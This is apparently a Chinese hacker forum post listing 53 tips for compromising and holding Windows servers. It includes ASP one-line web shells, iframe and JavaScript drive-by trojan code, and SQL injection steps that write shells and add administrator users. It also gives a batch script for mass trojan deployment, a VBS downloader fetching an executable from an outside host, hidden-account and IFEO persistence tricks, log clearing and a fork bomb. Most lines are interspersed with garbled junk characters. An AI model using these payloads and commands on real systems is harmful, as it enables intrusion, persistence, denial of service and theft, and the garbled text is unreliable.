1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,3 D& s+ _8 t4 p8 P* t) ~! d6 r
cacls C:\windows\system32 /G hqw20:R
: N, v% v+ A! P& V4 L& }思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
) r* \! x Y! v# u* C+ P恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
! j& S4 m" M; ?2 r+ ~3 ]- ?' y# v* A8 _! l) ~( X4 T; ~
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
. B# q, f+ J. T+ L
6 \9 X& O/ Y& {5 \5 y# v3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
/ Y9 \. I( A7 A4 n9 t
" T* V4 ~" _8 G! F9 b4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号. v+ H3 {% C9 `. c( g
5 ~/ R1 p: P( e$ f+ b% M
5、利用INF文件来修改注册表$ H* l' D7 c$ |6 M0 Y- P7 [
[Version]6 T* t4 H$ x+ _9 `4 F
Signature="$CHICAGO$"& b* \& _1 e. g; b% I
[Defaultinstall]
$ w5 @/ D, d [* IaddREG=Ating' p8 I5 M! W# G: H- ^; p
[Ating]
' D, y& g" w" K3 u; D* }HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
# p, ~: v* u+ [5 i4 A, x以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
( O3 g0 h4 j( S$ zrundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径% L* Z9 Q+ I: c# T* i/ u1 u
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
2 p0 r$ \; }0 E9 H- g5 CHKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU# X) B! M+ w( W
HKEY_CURRENT_CONFIG 简写为 HKCC! E; C( F$ P7 D. q( G
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值 ?$ J6 Y+ p2 m0 n
"1"这里代表是写入或删除注册表键值中的具体数据4 l/ L7 w% p' c U
4 b3 I# t) \ ?: {5 h0 A6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
+ d6 n/ X9 K& z" U多了一步就是在防火墙里添加个端口,然后导出其键值$ g, d8 V0 v8 ^- `4 M. U1 Q8 ~( G
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List], B: t @0 E9 \: Q! y. l% P* }
6 a3 p- x1 r0 N, B
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽3 W6 x* f J! e5 X
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
" Y I9 w# C5 x* v( Z* I2 W1 f1 D# } l
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。2 T8 S2 `. m$ @$ O6 X; s. I
$ V% z6 t2 m! N! e9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,+ b7 c" N# g, ?
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
3 ]& G% U6 x. t" M& o* M0 x; J: f5 a
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”3 [8 q/ M% P8 A8 E$ b# W9 c8 K! C( l
/ Q: [6 o' f* [/ e% S/ z7 I6 O11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
% m) l6 g3 I+ B! V$ r: j用法:xsniff –pass –hide –log pass.txt: K7 b/ H( N4 B" |2 H
) J6 n, G4 _7 m8 X
12、google搜索的艺术
3 G! F$ h& x: _8 S- V' p搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”9 G' l# C& @7 o# Q6 Y
或“字符串的语法错误”可以找到很多sql注入漏洞。
: }6 `0 B% j) w* r& C% L
! w& ]3 |4 F+ w13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。3 k8 y6 M1 Y' h! V' P; B4 t
" h& c0 ?6 Y0 g1 q0 r/ }& K# u
14、cmd中输入 nc –vv –l –p 19871 ?; |! C$ `( r+ o( l
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃7 Z6 x! O" ^, n+ L# Y9 D
. E" c1 n) x6 l- ~2 }
15、制作T++木马,先写个ating.hta文件,内容为
& Y; V, u7 x# l. }* W: r! V<script language="VBScript">
, N+ x7 b3 c( n1 K, Y' N* G& Z/ Bset wshshell=createobject ("wscript.shell" )) J% _( E7 x+ i3 M
a=wshshell.run("你马的名称",1)5 s- s7 B' O; y _
window.close
6 H+ L$ P3 V- E</script>- s8 ]# y9 L6 g! [) l' ^( R
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
: O! W9 X6 S& i
" p, f; ^# A' u% z$ Z! B! ~* }16、搜索栏里输入
. [+ N& A" e5 x2 u+ u# s6 R& r关键字%'and 1=1 and '%'='
' C7 g! [$ A0 C3 f0 I# [9 z9 {2 s, }) T关键字%'and 1=2 and '%'='- d$ m- M! Y( y1 @5 Y
比较不同处 可以作为注入的特征字符
w# x1 R2 d9 L% l! ]1 j J
3 `+ u! ^* {- n* ]: O& n17、挂马代码<html>
- V; r9 z) z6 t# y2 {<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>6 l3 H$ [8 @4 C) i: b
</html>
" p4 q+ c- u* O ]0 E8 g
1 ~5 Z* L. j9 ?! v: m) X18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
) O x `4 k$ o+ I1 R/ O" j: ]net localgroup administrators还是可以看出Guest是管理员来。" [0 L' o; [7 c) v! b8 t% ~
- e8 ?: \% X4 K- L( C& l
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等* z7 h2 ^% e& j0 q6 e
用法: 安装: instsrv.exe 服务名称 路径
+ ?, m" V3 t* z, D卸载: instsrv.exe 服务名称 REMOVE/ H6 N' k) {- }" ?0 w
) j( O. I, B* c# L0 I/ j1 Z
$ X- }$ p) m% G- ?& e! E21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
\* I0 x, P7 V5 [# A9 R0 J- a不能注入时要第一时间想到%5c暴库。
8 I* @& A Z4 [# w
0 {+ i: J& _ Q. f22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
+ |; K- y n2 A5 x- i3 K, k2 v- [3 ^2 W7 v" ^
23、缺少xp_cmdshell时
# d% Z `; k- A尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'& Y3 S" z$ h8 z5 T" q a: z
假如恢复不成功,可以尝试直接加用户(针对开3389的)/ O4 _' C. T9 Y6 M3 a( V
declare @o int
6 r0 w# n& s) fexec sp_oacreate 'wscript.shell',@o out' F* l0 b1 \6 m) x' ]7 R) T# {
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员 H' Y) k: i+ D" g" B: P% |
. S9 b( j+ d. e8 [. ~
24.批量种植木马.bat
3 p% \6 a1 `5 k" ?* c1 y% Nfor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
4 C) l% o$ u$ c" N8 Hfor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
) U3 f2 F* O1 t7 I+ `0 M* ?4 w2 r扫描地址.txt里每个主机名一行 用\\开头
0 n3 p8 s4 _' [) e# A" ~
+ H# O$ }+ |+ r/ H25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。/ H3 y% n: `+ `4 ?* |; i/ q
2 Y2 M/ x+ G4 v# j26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.% q8 c1 U) a4 h1 r/ f2 V
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.7 g6 H; n* X4 q' T4 `5 ?
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
. g% O, h( K" V0 u: h9 J! j
/ r1 _0 a ?/ J0 ~% g27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
0 B7 x* b* ?! @3 Q然后用#clear logg和#clear line vty *删除日志8 T$ X+ }3 N5 a0 h3 P) |8 c
, H V% q E( z" O; s( B, |
28、电脑坏了省去重新安装系统的方法
/ b% J9 l3 X Q纯dos下执行,3 \0 F7 c' w4 P0 |( U# j3 M
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config9 @% k+ D% r8 z% F2 N
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config+ r/ A2 ]2 ?/ m" `
& c1 x1 x, Y9 _5 ^8 B
29、解决TCP/IP筛选 在注册表里有三处,分别是:* P9 e" N' d. m5 N+ F: w. u, m
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip4 a, j3 R" s: C( M4 ?4 Y
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
& E s* J- V) h# Z0 r: FHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip2 |5 F% u: R# S" V9 t) X
分别用
; u9 l% B# @5 Q3 A5 lregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip6 a! F/ Q. {# @) U9 |; \7 C, f+ D9 Q
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip; Q9 t+ H$ R+ H
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
- k5 k* J% J1 m, |命令来导出注册表项
% F* X) o; v1 u2 u然后把三个文件里的EnableSecurityFilters"=dword:00000001,
* k* R& ^/ I2 l7 [) h改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
, ~/ o9 ]$ X, ^) a/ Z. L5 qregedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
( a6 S" S/ H" Q: T: J( u5 I; w0 B9 V h
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
2 Q) z O8 S% Q: D, mSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的38 l* h) N& C" D2 z% }& |! x
7 }2 f, g4 q8 P& V; z6 [
31、全手工打造开3389工具
/ n3 X: d/ X8 s( L+ Q$ \! s打开记事本,编辑内容如下:
; K7 Y' D& e' C% q8 }' I7 Recho [Components] > c:\sql
5 g6 |$ l! H- l; K1 @: ~7 V1 recho TSEnable = on >> c:\sql* v6 h# p" T a! Q* M! J t+ q
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q1 }+ ]; P# N" q. M$ j9 t6 t. _
编辑好后存为BAT文件,上传至肉鸡,执行! `" V) k! Q' l4 k! r
( Z$ v& r8 R! V& n- d6 [; I: W32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
4 S+ u: q1 _" O- E! D
5 O3 N& I0 {2 D* S9 c33、让服务器重启1 A/ q: G% S( N/ Y" Z
写个bat死循环:' S. @# W" |2 P! ]' z0 g
@echo off
9 q9 i9 k! C; k& M# K. C* r:loop1! J3 Y4 |. i3 m3 |
cls
% ?" E! i3 q& S+ p* G$ D( bstart cmd.exe' y8 A1 }3 c8 D- o! X! N7 G! d0 U
goto loop1( c+ w% p% H8 D+ B
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
8 r8 a7 [- W% i! r: g4 ~
8 g% P6 z5 v& d. X) C34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
2 q2 y6 }! b& j@echo off
: C* \6 G% i& h! i" l! P: z, {date /t >c:/3389.txt; m& T; [; Q) H) `
time /t >>c:/3389.txt
& p: W1 R5 E0 X9 ]5 X; n6 `attrib +s +h c:/3389.bat# ?' |; k6 G' n) f( X% f# @! Y( R
attrib +s +h c:/3389.txt
2 C+ C) w Y; l0 a& M/ O: F3 e' snetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
' C7 S# Y8 ?! r5 ~/ z并保存为3389.bat
- N' w# l1 u- Y6 i# A8 E打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号6 K- {* ~+ \6 _6 x
% \) S2 b- t+ K35、有时候提不了权限的话,试试这个命令,在命令行里输入:3 B6 e# ]- s; T4 O
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
6 B. W" m Q2 @9 n3 L3 j x输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
' S3 ~4 Y5 g8 B7 T$ k( s9 @7 n
/ o# R9 T5 T4 ~3 P/ f! ^36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件3 }, ?% ~! X T: h7 R
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址! s% \' R! |6 r
echo 你的FTP账号 >>c:\1.bat //输入账号
7 k( t# }8 y5 X8 _" ?echo 你的FTP密码 >>c:\1.bat //输入密码- t5 E( m% W5 B' y
echo bin >>c:\1.bat //登入8 y- Z4 e+ W& [, o. [2 S- Z
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
c( I) x, l' e T. l) n7 w* |% ~echo bye >>c:\1.bat //退出
; w+ ]! m8 k& x' E0 b7 |然后执行ftp -s:c:\1.bat即可
: P' z. r- J. Y! \
+ ?) w# A" k8 T( Y& ?1 m: [, \! f37、修改注册表开3389两法+ X& p) b# @& G
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表% O4 z' y4 f. [: x7 R
echo Windows Registry Editor Version 5.00 >>3389.reg$ u9 u' e6 Z. H9 }
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
2 ]/ Y5 l; u3 C& Q: G2 ^echo "Enabled"="0" >>3389.reg
: z5 m: i$ |- Q% t* q0 K- ^echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows+ D6 A! Z6 ~- z0 _$ [9 `
NT\CurrentVersion\Winlogon] >>3389.reg
! f; Z. S( {5 k) L2 `+ |echo "ShutdownWithoutLogon"="0" >>3389.reg
. T& P, g" p" x. ?. u U* eecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] @! q8 _4 N4 s s# m* W! `
>>3389.reg
3 u B. d: d) b' A c3 A; O( Qecho "EnableAdminTSRemote"=dword:00000001 >>3389.reg
3 c: Z! F! {9 jecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
" R" R. [5 u# S0 E% T# m>>3389.reg
! E" M, i% T3 D$ Yecho "TSEnabled"=dword:00000001 >>3389.reg
. H4 \( `5 J3 s- @echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
1 h8 J2 e6 ^# K) O0 r8 K a5 Wecho "Start"=dword:00000002 >>3389.reg7 o5 H: a6 P j, D( n
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]. t( B, F# ]) K* t
>>3389.reg v" r D: `/ f
echo "Start"=dword:00000002 >>3389.reg
6 W( u' g+ X$ n/ g: _* w& n$ Zecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
$ D8 P$ u1 f6 aecho "Hotkey"="1" >>3389.reg
' }, s8 ?. Q' W, gecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
9 [ p$ u; ?/ ]5 ?3 wServer\Wds\rdpwd\Tds\tcp] >>3389.reg
; C& A* `1 Q' z* e& Techo "PortNumber"=dword:00000D3D >>3389.reg
' F% B& V/ |1 techo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal; }% Z* O1 V7 N. E! \3 w
Server\WinStations\RDP-Tcp] >>3389.reg
1 X5 P. _' S8 c5 r5 kecho "PortNumber"=dword:00000D3D >>3389.reg
* b* U; y0 x: q7 \& z把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
, [7 i1 m" }6 _(如果要改变终端端口只须把上面的两个D3D都改一下就可以了): @% z( |8 D% A) z8 O( z
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
8 | e0 e# G/ C& ~0 c; Y D(2)winxp和win2003终端开启+ _4 P* D$ g3 Y9 [7 ^
用以下ECHO代码写一个REG文件:" ]7 `! G; _2 R, `9 T/ J3 A
echo Windows Registry Editor Version 5.00>>3389.reg
4 l8 O" O9 Z/ F7 d; z/ vecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal% u2 `1 _# d: Q* V0 o5 ^
Server]>>3389.reg
' x0 |" ~4 P, [. G9 z1 Techo "fDenyTSConnections"=dword:00000000>>3389.reg
( y3 f' m. [$ N" \echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal. J9 h: R F: K% {8 H) m! w
Server\Wds\rdpwd\Tds\tcp]>>3389.reg0 p4 A! N" K( V$ n7 H `2 ?
echo "PortNumber"=dword:00000d3d>>3389.reg
5 w1 I) x! x. s& z4 |2 Xecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal( |- X7 N. C0 E2 i9 b
Server\WinStations\RDP-Tcp]>>3389.reg
( t: Y9 y& u' `* {( x( u' N4 iecho "PortNumber"=dword:00000d3d>>3389.reg% i/ K: _+ B. N* t& Q) }7 I
然后regedit /s 3389.reg del 3389.reg, `' u" u! ]5 e( z0 l
XP下不论开终端还是改终端端口都不需重启 Q. i9 q- w9 h9 o1 H0 z. [
% ?4 |! O9 e; j# r
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
* c) q1 i2 I! C; ^' b% _# }/ Z用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
6 X) `0 Q% @4 Q6 y' _
# [) `: b% c) Z' l$ g2 r39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!. A# o& N1 d' q! J1 @
(1)数据库文件名应复杂并要有特殊字符* }, j$ o1 c4 [& _( G: s
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源' W; F, A. |# s, f- ^4 z8 u
将conn.asp文档中的6 w$ l3 {! J% @5 ^, L
DBPath = Server.MapPath("数据库.mdb")
4 r# G4 i9 I( D% ]1 E% P% |conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
E+ y$ G, [* K
3 B9 q( z% _- _" q修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置- M: I; Q5 U& H/ _* y
(3)不放在WEB目录里' r+ C1 _5 t0 Y6 k; M2 Z% N
! ^. I7 A# i) i) d40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
" y& v% W/ t/ M可以写两个bat文件2 y4 Z3 N' x! m; V
@echo off
- p/ y2 h7 G( J@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
6 _* F6 _, ?+ `$ T* [@del c:\winnt\system32\query.exe
! D& I: I$ z7 G8 M$ G@del %SYSTEMROOT%\system32\dllcache\query.exe, Z: E% y- K" N1 b" ^, X
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的; R; ^% X O; S" G3 x5 w* r/ q6 Q2 B
/ q- ?* n2 u; d: z/ I* f4 G& f@echo off
) R4 q% f, d+ A$ C& k@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
8 H. `/ C8 C/ X! g& n@del c:\winnt\system32\tsadmin.exe
7 |' d; g9 U' V' P@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
' m" Y% C; ~" G, n3 {9 ^) I8 ~- B0 I: B( P( I8 n
41、映射对方盘符
" G8 u# e1 ~% B J" jtelnet到他的机器上,
& L2 A; M! o Wnet share 查看有没有默认共享 如果没有,那么就接着运行
% [, L6 ?/ l% c; G0 ^7 Vnet share c$=c:
/ N1 c |' ~1 V; |net share现在有c$( j, X, X" k% H) o
在自己的机器上运行8 W( d* q: T: b }4 S5 f: a( A1 _
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K4 e5 \( G' l% E! M' J1 b
9 S9 w4 `/ S. j( z% R
42、一些很有用的老知识
9 | f% C0 o& C3 Wtype c:\boot.ini ( 查看系统版本 )* }- N) o0 _5 Y) I! m& ?4 ^! }- z2 F4 {
net start (查看已经启动的服务)
8 N& p0 X$ r* G5 d+ Lquery user ( 查看当前终端连接 )
% L: l' a# H) a! Q8 T* a1 tnet user ( 查看当前用户 )
$ T8 o: N# F: y- N Cnet user 用户 密码/add ( 建立账号 )
0 k& a6 Y, X/ ?% znet localgroup administrators 用户 /add (提升某用户为管理员)
" U! N; V! X9 a3 ` u/ U0 Cipconfig -all ( 查看IP什么的 )
9 H5 B' }* ]$ t- e' u2 }$ }netstat -an ( 查看当前网络状态 )# t4 Q- H* W3 ?6 `2 |% J+ z
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
6 N# c/ E" i1 B# m2 }克隆时Administrator对应1F4
* w, y% s9 \$ D/ D' jguest对应1F5% R( e" a) _+ D3 W4 z, ~: T
tsinternetuser对应3E85 k3 Y$ |! b) Q2 t3 `: w5 M
' S' Q! p4 q+ F0 d4 g* x
43、如果对方没开3389,但是装了Remote Administrator Service
5 ?+ k. K# H) g4 j( N; Q' x用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接% X' x3 g0 \! j; ^, t% A
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息4 ~% Q, R$ |5 C0 B2 m
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
( X, Q3 W4 ^9 e$ o, r6 z0 P# b: s/ l8 p
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
, c4 N' I6 e" ~) G9 T9 P& b# F本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
" O1 B+ s% q' n2 o' w Z4 ~
# Z) U9 O5 S8 H1 k5 u% b45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)2 M* f, W8 ]+ ]9 L! Q
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open7 t9 G l( b& N2 j2 i# V' [
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =; |; E2 ?2 o$ L- U) c; R6 S& b4 X
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
u- [8 y2 @9 d2 W9 U2 ?# m1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
+ s- `$ L! a1 k, J7 ?, d3 F f(这是完整的一句话,其中没有换行符)$ M2 p* ^ w. ?! E- {2 L7 k7 U
然后下载:* L& U7 R' J$ {6 r* m) [( l
cscript down.vbs http://www.hack520.org/hack.exe hack.exe
' k) _- i6 _$ z8 ~& |
" _$ `3 Q2 c6 j0 |6 v' h46、一句话木马成功依赖于两个条件:. D7 Y7 `) Z1 B1 j4 C5 p
1、服务端没有禁止adodb.Stream或FSO组件& Y3 O) k$ {/ C/ Z+ G; h( D3 J2 u
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
1 j3 E. F5 w& C6 h. y: y; z) s1 i
5 D# k$ b; y- R+ W! c47、利用DB_OWNER权限进行手工备份一句话木马的代码:
8 ]6 P9 M/ o2 M, N;alter database utsz set RECOVERY FULL--2 N7 A6 K1 O1 J4 X9 i. l
;create table cmd (a image)--3 _# l' E7 W/ W$ K
;backup log utsz to disk = 'D:\cmd' with init--
: U$ c/ ]2 f- N- h, b- f2 z) {, t;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
4 [3 |: Q! C$ b& D" B) r;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
# \, H* K+ e: c注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。) V; O! ^8 E2 }4 ?. @
; q* O/ h2 ]7 F& z48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
% H+ R9 _0 ~5 C D8 U: v" R ]3 t* c4 ^7 v! }
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
, [- [: e8 K- @) a6 z& k所有会话用 'all'。
/ k: _4 ]- O, u7 B0 m8 w0 O A-s sessionid 列出会话的信息。3 S) h$ `+ l% j* e% v. N
-k sessionid 终止会话。
: q# U. J4 c) j% {2 t0 B- S* {-m sessionid 发送消息到会话。) B: ?, S3 k/ C, G
?! z* W; f( [
config 配置 telnet 服务器参数。
# L8 z6 C0 G' V
: i; P$ N D- c' S$ l& Gcommon_options 为:' m, V3 i! I/ J6 e
-u user 指定要使用其凭据的用户3 S( {, y" ]7 z$ L O' A6 N
-p password 用户密码% m0 k4 w* ?9 I! m* ?
" h1 T( G$ s j) s+ [9 b9 T. J
config_options 为:4 l# K6 i9 V6 E* A
dom = domain 设定用户的默认域
3 `1 F$ i* o6 R' ~ctrlakeymap = yes|no 设定 ALT 键的映射! Y) k) m2 D @" R b; i G
timeout = hh:mm:ss 设定空闲会话超时值
' a- H, f7 i* {# N6 X }$ }timeoutactive = yes|no 启用空闲会话。5 B8 c: ^5 i5 u) A8 T
maxfail = attempts 设定断开前失败的登录企图数。
4 Y- J: h1 T, G7 Gmaxconn = connections 设定最大连接数。
1 w) S# p0 _5 S' O. Bport = number 设定 telnet 端口。7 e t- W; y1 m9 N" P5 M3 e- ?
sec = [+/-]NTLM [+/-]passwd: M. j! @& j r0 j5 p
设定身份验证机构
& ?; a, q: L R6 B0 D$ q' N# ^fname = file 指定审计文件名。% z; @9 V/ S) Z0 ?* _ V) [5 ]$ R
fsize = size 指定审计文件的最大尺寸(MB)。
6 H* O2 b& s- Lmode = console|stream 指定操作模式。
, z' k& `/ K, q/ W7 Qauditlocation = eventlog|file|both* w1 v' U8 F y% _2 V# [
指定记录地点
8 D/ D: n3 C, \/ {0 Faudit = [+/-]user [+/-]fail [+/-]admin
% v" C" U/ m. y/ r: }# L- O1 E- ]3 \1 B: H3 q: s$ _
49、例如:在IE上访问:
; Z" [) z0 S, |www.hack520.org/hack.txt就会跳转到http://www.hack520.org/
! W- c( D4 S E3 ^# L3 lhack.txt里面的代码是:6 w; D' @' [ K( T- h0 b
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">1 F! `2 N& R. ]* t; ?/ B( D$ x
把这个hack.txt发到你空间就可以了!
7 Y& A5 {5 |9 `" @7 ^/ |4 R这个可以利用来做网马哦!
2 g" @4 a2 ^3 l) M& N- T2 ]" H& I
50、autorun的病毒可以通过手动限制!
# `" A3 j! g6 m+ _3 O1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
) w. [% n7 o3 Q, Q7 ~, V+ `2,打开盘符用右键打开!切忌双击盘符~
8 O5 F5 n6 C3 g. }3 [" k3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
. x: ~* i+ q ^) T/ e% B# V% I) o
51、log备份时的一句话木马:4 \; z3 X$ f- O
a).<%%25Execute(request("go"))%%25>
, |) z. Y8 c& O: }b).<%Execute(request("go"))%>
4 G5 `# }$ ~& Z3 oc).%><%execute request("go")%><%
: t! i: `5 j0 b7 q- s& rd).<script language=VBScript runat=server>execute request("sb")</Script>) i# T, I! x* D( Z
e).<%25Execute(request("l"))%25>
. ?# E2 z G1 w2 G X5 y$ |6 X* vf).<%if request("cmd")<>"" then execute request("pass")%>
$ g1 M+ o+ ?0 p9 e. \: R. m* P. U5 G+ d0 E. P2 v! }1 @# r% ?
52、at "12:17" /interactive cmd0 w5 \/ _- o" [0 M! D. K
执行后可以用AT命令查看新加的任务
" R& g+ N9 I% E5 Y# n! H3 J用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
3 W( t( M$ m; ^. d( o$ t" G' ]2 W6 \
53、隐藏ASP后门的两种方法- f6 a+ I+ Q$ a6 W( j5 z j
